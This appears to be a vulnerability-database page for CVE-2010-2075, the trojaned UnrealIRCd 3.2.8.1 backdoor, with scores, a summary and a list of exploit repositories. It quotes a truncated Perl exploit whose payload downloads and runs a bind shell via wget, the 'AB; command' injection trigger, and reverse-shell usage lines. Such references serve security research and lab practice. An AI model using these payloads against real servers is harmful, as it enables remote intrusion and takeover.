7.5
CVSSv2

CVE-2010-2075

Published: 15/06/2010 Updated: 18/06/2010
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 764
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

UnrealIRCd 3.2.8.1, as distributed on certain mirror sites from November 2009 through June 2010, contains an externally introduced modification (Trojan Horse) in the DEBUG3_DOLOG_SYSTEM macro, which allows remote malicious users to execute arbitrary commands.

Vulnerability Trend

Vulnerable Product Search on Vulmon Subscribe to Product

unrealircd unrealircd 3.2.8.1

Exploits

#!/usr/bin/perl # Unreal3281 Remote Downloader/Execute Trojan # DO NOT DISTRIBUTE -PRIVATE- # -iHaq (2l8) use Socket; use IO::Socket; ## Payload options my $payload1 = 'AB; cd /tmp; wget packetstormsecurityorg/groups/synnergy/bindshell-unix -O bindshell; chmod +x bindshell; /bindshell &'; my $payload2 = 'AB; cd /tmp; wget e ...
## # $Id: unreal_ircd_3281_backdoorrb 11227 2010-12-05 15:08:22Z mc $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions Please see the Metasploit # Framework web site for more information on licensing and terms of use # metasploitcom/framework/ ## require 'msf/core ...

Github Repositories

Exploit for CVE:2010-2075. This exploit allows remote command execution in UnrealIRCd 3.2.8.1.

CVE-2010-2075 Exploit for CVE:2010-2075 This exploit allows remote command execution in UnrealIRCd 3281 Requirements optparse, signal Usage You can send a command to execute, but there will be times when it will not respond, but you can simply send a reverse shell and wait for it to arrive python3 CVE-2010-2075py -t 1002119 -p 6667 -c 'bash -c "bash -i &

UnrealIRCd 3.2.8.1 backdoor command execution exploit in Python 3 (CVE-2010-2075).

UnrealIRCd 3281 Backdoor Command Execution UnrealIRCd 3281 backdoor command execution exploit in Python 3 (CVE-2010-2075) Description UnrealIRCd version 3281 contains a trojan horse which allows remote attackers to execute arbitrary commands (CVE-2010-2075) I referenced the Metasploit payload payload/cmd/unix/reverse_perl to make this script Usage Start a Netcat lis

FreePascal implementation of the UnrealIRCD CVE-2010-2075

CVE-2010-2075 FreePascal implementation of CVE-2010-2075 Vulnerability UnrealIRCd 3281 RCE by sending "AB; command" to any listening service Any command you send is executed by the same user as UnrealIRCD runs as This implementation launches a reverse shell to your listener Step 1 Start a listener, ex netcat -lvp 4444 Step 2 Execute exploit /exploit <ta

About me.

chancej715 About Hi, I'm Chance Johnson, a security consultant who enjoys breaking web applications and computer networks Blog: chancej715githubio/ Resume: chancej715githubio/resume/ Website: chancej715githubio/website/ Posts Steal KeePass 2x < 254 Master Password Decode Network Packet Hex Dump Projects Raw Traffic PowerShell TC

UnrealIRCd 3.2.8.1 backdoor command execution exploit in Python 3 (CVE-2010-2075).

UnrealIRCd 3281 Backdoor Command Execution UnrealIRCd 3281 backdoor command execution exploit in Python 3 (CVE-2010-2075) Description UnrealIRCd version 3281 contains a trojan horse which allows remote attackers to execute arbitrary commands (CVE-2010-2075) I referenced the Metasploit payload payload/cmd/unix/reverse_perl to make this script Usage Start a Netcat lis

Collection of hand-crafted exploit PoCs (proof-of-concepts) for public Common Vulnerabilities and Exposures (CVE), 1-day vulnerabilities & maybe 0-days.

Pwn House Description Collection of hand-crafted exploit PoCs (proof-of-concepts) for public Common Vulnerabilities and Exposures (CVE), 1-day vulnerabilities & maybe 0-days Contents OSVDB-73573 CVE-2010-2075 Resource OSVDB-73573 vsftpd v234 Backdoor Command Execution, a malicious backdoor was added to the VSFTPD download archive This backdoor was introduced into

Collection of hand-crafted exploit PoCs (proof-of-concepts) for public Common Vulnerabilities and Exposures (CVE), 1-day vulnerabilities & maybe 0-days.

Pwn House Description Collection of hand-crafted exploit PoCs (proof-of-concepts) for public Common Vulnerabilities and Exposures (CVE), 1-day vulnerabilities & maybe 0-days Contents OSVDB-73573 CVE-2010-2075 Resource OSVDB-73573 vsftpd v234 Backdoor Command Execution, a malicious backdoor was added to the VSFTPD download archive This backdoor was introduced into

FreePascal implementation of the UnrealIRCD CVE-2010-2075

CVE-2010-2075 FreePascal implementation of CVE-2010-2075 Vulnerability UnrealIRCd 3281 RCE by sending "AB; command" to any listening service Any command you send is executed by the same user as UnrealIRCD runs as This implementation launches a reverse shell to your listener Step 1 Start a listener, ex netcat -lvp 4444 Step 2 Execute exploit /exploit <ta

HTB Irked (10.10.10.117)

PART 1 : Initial Recon nmap --min-rate 1000 -p- -v 101010117 PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 111/tcp open rpcbind 6697/tcp open ircs-u 8000/tcp open http-alt 8067/tcp open infi-async 46040/tcp open unknown 65534/tcp open unknown nmap -oN irkednmap -p22,

UnrealIRCD 3.2.8.1 RCE

UnrealIRCD-3281-RCE UnrealIRCD 3281 remote code execution exploit (RCE) CVE-2010-2075 - nvdnistgov/vuln/detail/CVE-2010-2075 Useful for Offsec Proving Grounds Machine SunsetNoontide usage: exploitpy [-h] rhost rport lhost lport

SoftwareSec-Metasploitable2 Overview Attempt to get a shell onto a remote system (Metasploitable2) and extract its password and shadow files for password cracking Using SSH to verify results Set Ups Virtual Box Set up a local nat network File > Preferences > Network > add Nat Network Kali Settings > Network > Attach to > Nat Network u

Exploit for CVE:2010-2075. This exploit allows remote command execution in UnrealIRCd 3.2.8.1.

CVE-2010-2075 Exploit for CVE:2010-2075 This exploit allows remote command execution in UnrealIRCd 3281 Requirements optparse, signal Usage You can send a command to execute, but there will be times when it will not respond, but you can simply send a reverse shell and wait for it to arrive python3 CVE-2010-2075py -t 1002119 -p 6667 -c 'bash -c "bash -i &

UnrealIRCD-3281-Backdoor UnrealIRCd 3281 backdoor command execution exploit in Python 3 (CVE-2010-2075) Description UnrealIRCd version 3281 contains a trojan horse which allows remote attackers to execute arbitrary commands (CVE-2010-2075) Usage nc -lp 4444 Execute the script, providing the following positional arguments: pytho

Script that exploits the vulnerability that allows establishing a backdoor in the UnrealIRCd service with CVE-2010-2075

UnrealIRCd-3281-Backdoor-Command-Execution Script that exploits the vulnerability that allows establishing a backdoor in the UnrealIRCd service with CVE-2010-2075